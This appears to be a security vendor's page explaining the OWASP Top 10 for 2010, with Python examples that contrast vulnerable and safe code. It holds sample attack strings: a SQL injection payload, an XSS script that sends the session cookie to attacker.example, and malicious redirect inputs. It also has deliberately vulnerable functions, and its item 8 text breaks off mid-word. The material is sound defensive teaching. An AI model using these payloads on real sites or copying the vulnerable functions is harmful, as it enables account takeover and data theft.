Customer Anxiety Zero Network

Fearless Financial Transactions From Top Cat Networks
Know the Enemy

It is said that one who knows the enemy and knows himself will not be endangered in a hundred engagements.

One who does not know the enemy, but knows himself will sometimes be victorious, sometimes meet with defeat.

One who knows neither the enemy nor himself will invariably be defeated in every engagement.

Sun-tzu, "The Art of War", Chapter 3

Your Enemy Knows You

Before starting an attack, the enemy will spend some time learning the weaknesses of your site. He will most likely create an account to learn the login process and sniff packets during logon and other transactions. He will also study other attackers who have been successful and listen to the chatter on blogs and other gatherings. He will pay for information on attacks that have not been used before and will try to limit disclosure of them. He really does not want you to know what he is up to.

OWASP Top 10 for 2010

On April 19, 2010 the Open Web Application Security Project (OWASP) released the final version of its Top 10 for 2010. The following is this site's interpretation of these attacks for financial services; OWASP publishes its own documentation of each item.

1: Injection

In an injection attack the attacker supplies input (a URL parameter, form field, cookie or header) that the web server copies into a query or command sent to a back-end server, so that the attacker's text is executed as part of that query and leaks or alters data. Typically the target is a SQL database driven by queries the web server builds from what the user's browser sent. The best mitigation is to NEVER paste any part of the request into a query or command forwarded to another computer. Interpret the request in the web server, and construct every message to other servers entirely in the web server, passing request data only as bound parameter values and never as query text. No text from the browser should ever be trusted to run on any server at any time.
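As an added example (not code from the original page), the following Python script shows the difference between pasting a request parameter into SQL text and binding it as a value. The account table, the account names and the attacker string are constructed for the demonstration; SQLite stands in for whatever back-end database the site uses.

```python
import sqlite3

# Constructed sample accounts for the demonstration (hypothetical data).
ACCOUNTS = [
    (1, "alice", 1200.50),
    (2, "bob", 87.25),
    (3, "carol", 99999.00),
]


def make_db():
    """Build an in-memory SQLite database holding the sample accounts."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE accounts (id INTEGER PRIMARY KEY, owner TEXT, balance REAL)")
    conn.executemany("INSERT INTO accounts VALUES (?, ?, ?)", ACCOUNTS)
    return conn


def lookup_vulnerable(conn, owner):
    """VULNERABLE: the request parameter is pasted into the SQL text, so the
    database reads whatever the attacker typed as part of the query itself."""
    sql = "SELECT id, owner, balance FROM accounts WHERE owner = '" + owner + "'"
    return conn.execute(sql).fetchall()


def lookup_safe(conn, owner):
    """SAFE: the SQL text is fixed inside the server. The parameter is bound as
    a value, so quotes or keywords in it can never change the query."""
    sql = "SELECT id, owner, balance FROM accounts WHERE owner = ?"
    return conn.execute(sql, (owner,)).fetchall()


# Constructed attacker input: closes the quoted literal and appends a
# condition that is true for every row.
PAYLOAD = "x' OR '1'='1"

if __name__ == "__main__":
    db = make_db()
    print("vulnerable:", lookup_vulnerable(db, PAYLOAD))   # all three accounts leak
    print("safe:      ", lookup_safe(db, PAYLOAD))         # no such owner: []
```

The vulnerable query returns every account because the database sees `WHERE owner = 'x' OR '1'='1'`; the parameterized query looks for an owner literally named `x' OR '1'='1` and finds nothing.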

2: Cross-Site Scripting (XSS)

Cross-site scripting is like the injection attack in that the attacker places code (usually HTML or JavaScript) in a request, and the web server echoes it into the page it returns to the browser. The browser then runs that code as part of your site, so it can read the user's session cookie or page contents and send them to the attacker. These first two attacks are instances of the more general problem that occurs whenever data from one source is embedded in code interpreted by another. The mitigation is the same in spirit: do not copy any information from the incoming request directly into the response to the browser; encode it for the context where it lands (HTML body, attribute, script or URL) so that it is displayed rather than interpreted. Assume that any request contains an attack.
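As an added example (not code from the original page), here is a minimal server-side renderer in Python with the two page fragments, the attacker host and the two payloads all constructed for the demonstration. One version copies request data into the HTML; the other encodes it for the HTML body and for an attribute value with the standard library's `html.escape`.

```python
from html import escape

# Fragments of a hypothetical account page (constructed for this example).
BODY_TEMPLATE = "<p>Welcome back, {name}.</p>"
ATTR_TEMPLATE = '<input type="text" name="q" value="{q}">'


def render_vulnerable(name, query):
    """VULNERABLE: request data is pasted straight into the HTML, so markup
    the attacker supplied is parsed by the browser as part of the page."""
    return BODY_TEMPLATE.format(name=name) + ATTR_TEMPLATE.format(q=query)


def render_safe(name, query):
    """SAFE: every value is encoded for the context it lands in. html.escape
    replaces & < > " ' so the browser shows the text and never executes it."""
    return (BODY_TEMPLATE.format(name=escape(name))
            + ATTR_TEMPLATE.format(q=escape(query, quote=True)))


# Constructed attacker payloads. The first is a script that ships the session
# cookie to a hypothetical attacker host; the second breaks out of the value=""
# attribute and adds an event handler that fires as soon as the page loads.
PAYLOAD_BODY = ("<script>new Image().src="
                "'https://attacker.example/c?'+document.cookie</script>")
PAYLOAD_ATTR = '" autofocus onfocus="alert(document.cookie)'


def executes_payload(html):
    """Crude check used only for the demonstration: does the page contain a
    live <script> tag or an unencoded onfocus= handler?"""
    return "<script>" in html or ' onfocus="' in html


if __name__ == "__main__":
    print(render_vulnerable(PAYLOAD_BODY, PAYLOAD_ATTR))   # both payloads are live
    print(render_safe(PAYLOAD_BODY, PAYLOAD_ATTR))         # both are inert text
```

The encoding must match the destination: `html.escape` is right for the HTML body and for quoted attributes, but a value placed inside a `<script>` block or a URL needs JavaScript or URL encoding instead, which is why the safe renderer keeps each value's context explicit.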

3: Broken Authentication and Session Management

This attack can occur when the web site does not implement authentication and session handling correctly, allowing attackers to compromise passwords, keys or session tokens, or to exploit other implementation flaws to assume other users' identities. Session identifiers must be long random values, issued fresh at login so that an identifier planted in the browser before login is useless, expired on logout and after a period of inactivity, and carried only in cookies marked Secure and HttpOnly so they travel over TLS and cannot be read by scripts in the page.
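As an added example (not code from the original page), the following Python session store implements those rules: random identifiers, rotation at login, idle expiry, logout, and the cookie attributes. The fifteen-minute idle timeout and the practice of storing only a SHA-256 digest of each identifier are assumptions for the example; the clock is injectable so expiry can be tested without waiting.

```python
import hashlib
import secrets
import time

SESSION_TTL_SECONDS = 15 * 60   # idle timeout; an assumption for this example
SESSION_ID_BYTES = 32           # 256 bits of randomness per session id


class SessionStore:
    """Server-side session table. Only a SHA-256 digest of each session id is
    stored, so a stolen copy of the table does not hand out live sessions."""

    def __init__(self, now=time.time):
        self._now = now           # injectable clock, so expiry can be tested
        self._sessions = {}       # sha256(session id) -> {"user", "expires"}

    @staticmethod
    def _key(session_id):
        return hashlib.sha256(session_id.encode()).hexdigest()

    def login(self, user, presented_id=None):
        """Issue a brand-new id at login. Any id the browser presented before
        authenticating (possibly planted by an attacker) is discarded, which
        defeats session fixation."""
        if presented_id is not None:
            self._sessions.pop(self._key(presented_id), None)
        session_id = secrets.token_urlsafe(SESSION_ID_BYTES)
        self._sessions[self._key(session_id)] = {
            "user": user,
            "expires": self._now() + SESSION_TTL_SECONDS,
        }
        return session_id

    def user_for(self, session_id):
        """Return the user behind a presented id, or None if the id is unknown
        or has idled out. A valid lookup extends the idle window."""
        key = self._key(session_id)
        entry = self._sessions.get(key)
        if entry is None:
            return None
        if self._now() >= entry["expires"]:
            del self._sessions[key]          # drop the stale entry
            return None
        entry["expires"] = self._now() + SESSION_TTL_SECONDS
        return entry["user"]

    def logout(self, session_id):
        """Invalidate the session on the server, not just in the browser."""
        self._sessions.pop(self._key(session_id), None)


def session_cookie(session_id):
    """Set-Cookie value for the id: sent only over TLS, hidden from scripts
    (limits what an XSS bug can steal), not attached to cross-site requests."""
    return f"session={session_id}; Secure; HttpOnly; SameSite=Strict; Path=/"
```

Expiry is checked on every lookup rather than by a background sweep, so an identifier that was valid when stolen stops working on its own once the user has been idle.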

4: Insecure Direct Object References

A direct object reference occurs when a page exposes an internal identifier, such as a file name, directory or database key, in a URL or form field, and the server fetches that object without checking that the current user is entitled to it. An attacker who is allowed to view account 1001 simply asks for account 1002 and gets it. Every object fetched on behalf of a user must be checked against that user's rights on the server, and unpredictable or per-session indirect references reduce what an attacker can guess. Where the referenced objects are files, the same care applies in the other direction: hackers will test whether it is possible to overwrite them with infected files. Several Word and Acrobat exploits have been discovered that take over a computer with a malformed file. Be sure that is not possible from your web site.

5: Cross-Site Request Forgery (CSRF)

The attack works by placing a link or script on some site the user happens to be browsing. That link or script sends a request to another site to which the user is assumed to have already authenticated. Since most authentication information is carried in a cookie or another automatic response from the browser, the other web site receives valid user authentication information, assumes that the user is making a legitimate request, and processes it. The defence is to require, on every request that changes state, a secret value that the attacker's page cannot obtain: a token bound to the user's session and checked by the server, which the browser does not attach automatically the way it attaches cookies.
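As an added example (not code from the original page), the following Python shows a session-bound anti-forgery token for a funds-transfer form. The server secret, the `/transfer` endpoint, the form fields and the forged request are all constructed for the demonstration; the token is an HMAC of the session identifier, so it can be recomputed by the server on each request without storing anything extra.

```python
import hashlib
import hmac
import secrets

# Hypothetical server-side secret. In production it is loaded from protected
# configuration and shared by all web servers, never generated on each start.
SERVER_SECRET = secrets.token_bytes(32)


def csrf_token(session_id, secret=SERVER_SECRET):
    """Token bound to one session: HMAC(secret, session id). The attacker's
    page cannot compute it (no secret) and cannot read it (other origin)."""
    return hmac.new(secret, session_id.encode(), hashlib.sha256).hexdigest()


def verify_csrf(session_id, submitted, secret=SERVER_SECRET):
    """Constant-time comparison; a missing token is simply a failure."""
    if not submitted:
        return False
    return hmac.compare_digest(csrf_token(session_id, secret), submitted)


def render_transfer_form(session_id):
    """The legitimate page carries the token in a hidden field."""
    return ('<form method="post" action="/transfer">'
            f'<input type="hidden" name="csrf_token" value="{csrf_token(session_id)}">'
            '<input name="to"><input name="amount"><button>Send</button></form>')


def handle_transfer(session_id, form):
    """POST /transfer. The session id arrives in the cookie the browser attaches
    automatically; the token must arrive in the form body, which only a page
    served by this site could have filled in."""
    if not verify_csrf(session_id, form.get("csrf_token")):
        return 403, "rejected: missing or invalid CSRF token"
    return 200, f"moved {form['amount']} to {form['to']}"


# Constructed forgery: the attacker's page auto-submits this form to /transfer
# while the victim is logged in, so the victim's session cookie rides along.
FORGED_FORM = {"to": "attacker", "amount": "5000"}
```

A token copied from the attacker's own session fails as well, because the HMAC is over the victim's session identifier, not a shared value.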

6: Security Misconfiguration

Creating a secure web server requires attention to every detail of the configuration, especially as some web servers are not secure by default: sample applications, default accounts, directory listings and verbose error pages are common leftovers. Maintaining a secure web site means that every change gets a security analysis before deployment and that all security updates from the vendors are applied as soon as possible. Attackers depend on the lag between the release of a security patch and the time it is applied.

7: Insecure Cryptographic Storage

Any identity or authentication information a user gives a site must be protected with strong cryptography that an attacker cannot circumvent. Any concentration of such information is valuable to attackers and will be the target of extensive attacks. Passwords in particular should never be stored in a recoverable form: keep only a per-user salted hash computed with a deliberately slow function, so that a stolen database does not yield the passwords themselves. The credit card industry standard, PCI-DSS, is designed to address this issue, but recent exploits have demonstrated that more attention to the problem is needed than treating it as a simple check-off item.

8: Failure to Restrict URL Access

Applications embedded in web servers typically check the access rights of URLs, and every URL must be checked on the server for the requesting user's role on every request; leaving a page out of the menu is not access control. But these checks are layered on top of the operating system's Access Control Lists (ACLs) and so are not applied to applications operating outside of the web server. If such applications are running as a part of a web site, the accesses nee
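As an added example (not code from the original page), the following Python serves both item 4 (direct object references) and item 8 (URL access), since both come down to authorization checks performed on the server: a role check on the URL, then an ownership check on the object the URL names. The users, roles, statements and route table are constructed for the demonstration.

```python
# Constructed data: users with roles, and statements keyed by an internal id
# that appears in URLs such as /account/statement?id=101.
USERS = {
    "alice":   {"roles": {"customer"}},
    "mallory": {"roles": {"customer"}},
    "audit":   {"roles": {"admin"}},
}
STATEMENTS = {
    101: {"owner": "alice",   "body": "alice: opening balance 1,200.50"},
    102: {"owner": "mallory", "body": "mallory: opening balance 87.25"},
}

# Which roles may reach which URL. Anything not listed is denied, so a
# forgotten page is closed rather than open.
ROUTE_ROLES = {
    "/account/statement": {"customer", "admin"},
    "/admin/users":       {"admin"},
}


class Forbidden(Exception):
    pass


def check_route(user, path):
    """Server-side URL access check: hiding a link from the menu is not access
    control; this runs on every request regardless of how it was reached."""
    allowed = ROUTE_ROLES.get(path, set())
    if not USERS.get(user, {}).get("roles", set()) & allowed:
        raise Forbidden(f"{user} may not access {path}")


def get_statement_vulnerable(user, statement_id):
    """VULNERABLE: the URL is authorized but the id in it is trusted, so any
    logged-in customer can read any other customer's statement by changing
    the number."""
    check_route(user, "/account/statement")
    return STATEMENTS[statement_id]["body"]


def get_statement(user, statement_id):
    """SAFE: the object is looked up and then checked against the caller.
    Missing and foreign objects get the same answer, so ids cannot be probed."""
    check_route(user, "/account/statement")
    statement = STATEMENTS.get(statement_id)
    is_admin = "admin" in USERS[user]["roles"]
    if statement is None or (statement["owner"] != user and not is_admin):
        raise Forbidden(f"{user} may not read statement {statement_id}")
    return statement["body"]


def can_read(user, statement_id, handler=get_statement):
    """Boolean wrapper so the two handlers can be compared side by side."""
    try:
        handler(user, statement_id)
        return True
    except (Forbidden, KeyError):
        return False
```

The route table is deny-by-default, and the object check compares the record's owner with the authenticated user rather than with anything sent in the request, which is the whole of the fix for an insecure direct object reference.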

9: Insufficient Transport Layer Protection

Transport Layer Security (TLS, still widely called SSL) is supported by nearly every web server, but it is often avoided because of the imagined cost of operation. With modern computers this should no longer be an issue, and every page of a financial site, not only the login page, should be served over TLS so that session cookies are never exposed on the wire. Also be sure that the certificates are kept up to date and evaluate the benefits of Extended Validation (EV) certificates so that your users can be sure that they are on the correct site. Attacks against the transport layer are difficult, but have increased in recent years.
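As an added example (not code from the original page), the following Python builds a client context that refuses pre-1.2 protocol versions and verifies the peer's chain and hostname, and includes the expiry check a monitoring job would run against a certificate so that it is renewed before it lapses. The sample certificate dictionary is constructed in the shape `ssl.SSLSocket.getpeercert()` returns, with a hypothetical host and dates; the 30-day warning window is an assumption.

```python
import ssl

# Constructed peer certificate in the dictionary shape returned by
# ssl.SSLSocket.getpeercert() (hypothetical bank host and validity period).
SAMPLE_CERT = {
    "subject": ((("commonName", "www.bank.example"),),),
    "subjectAltName": (("DNS", "www.bank.example"), ("DNS", "bank.example")),
    "notBefore": "May 10 00:00:00 2007 GMT",
    "notAfter": "May 19 00:00:00 2007 GMT",
}


def make_client_context():
    """Client context that refuses SSLv3/TLS 1.0/1.1, verifies the chain
    against the system trust store and checks the hostname."""
    ctx = ssl.create_default_context()
    ctx.minimum_version = ssl.TLSVersion.TLSv1_2
    ctx.check_hostname = True
    ctx.verify_mode = ssl.CERT_REQUIRED
    return ctx


def days_until_expiry(cert, now):
    """Whole days from `now` (seconds since the epoch) to the notAfter date."""
    expires = ssl.cert_time_to_seconds(cert["notAfter"])
    return int((expires - now) // 86400)


def certificate_status(cert, now, warn_days=30):
    """'expired', 'expiring' (within warn_days) or 'ok', for a monitoring job."""
    days = days_until_expiry(cert, now)
    if days < 0:
        return "expired"
    if days <= warn_days:
        return "expiring"
    return "ok"


def dns_names(cert):
    """Host names the certificate is valid for (the names users will type)."""
    return [value for kind, value in cert.get("subjectAltName", ()) if kind == "DNS"]


if __name__ == "__main__":
    import time
    print(certificate_status(SAMPLE_CERT, time.time()), dns_names(SAMPLE_CERT))
```

In a real job the dictionary comes from `ctx.wrap_socket(sock, server_hostname=host).getpeercert()` after connecting; the functions above are the part that decides whether the certificate is about to lapse.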

10: Unvalidated Redirects and Forwards

Your web site users depend on safe behavior while using your resources. It is important to your brand that every link and redirect on your site leads to a site you intended. Without proper validation you might find that attackers have repurposed links or ads hosted on your site, or a redirect parameter in one of your own URLs, to send users to their attack pages with your domain lending them credibility.
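As an added example (not code from the original page), the following Python validates a `?next=...` style redirect parameter against an allow list of the site's own hosts and falls back to a fixed internal page for anything else. The host names, the default target and the list of attacker inputs are constructed for the demonstration; the inputs cover the common tricks (scheme-relative `//host`, user@host, look-alike subdomains, `javascript:` and backslashes) rather than only the obvious external URL.

```python
from urllib.parse import urlsplit

# Hosts a redirect may point at (hypothetical). Everything else falls back
# to a safe default inside the site.
ALLOWED_HOSTS = {"bank.example", "www.bank.example"}
DEFAULT_TARGET = "/account/summary"


def safe_redirect_target(target, default=DEFAULT_TARGET):
    """Validate a ?next=... style redirect parameter. Returns the target only
    when it is a local path or an https URL on one of our own hosts."""
    if not target:
        return default
    # Control characters, whitespace and backslashes are rejected outright:
    # browsers normalise "\" to "/" and whitespace can hide scheme tricks.
    if any(ch.isspace() or ord(ch) < 32 or ch == "\\" for ch in target):
        return default
    parts = urlsplit(target)
    if not parts.scheme and not parts.netloc:
        # Relative reference. "//host/path" has a netloc and is caught below;
        # here we also insist on a leading "/" so "evil.example/x" is refused.
        return target if target.startswith("/") else default
    if parts.scheme != "https":
        return default               # http:, javascript:, data: and friends
    if parts.hostname not in ALLOWED_HOSTS:
        return default               # covers user@host and look-alike hosts
    return target


# Constructed inputs an attacker might plant in a link or ad on the site.
ATTACK_INPUTS = [
    "https://attacker.example/login",
    "//attacker.example/login",
    "https://bank.example@attacker.example/",
    "https://bank.example.attacker.example/",
    "javascript:alert(document.cookie)",
    "/\\attacker.example",
    "http://www.bank.example/",      # our host, but not over TLS
]

if __name__ == "__main__":
    for candidate in ATTACK_INPUTS + ["/account/summary?tab=1"]:
        print(f"{candidate!r:45} -> {safe_redirect_target(candidate)}")
```

The check works on the parsed host name, not on a string prefix, which is why `https://bank.example@attacker.example/` and `https://bank.example.attacker.example/` are both refused even though each begins with the site's own name.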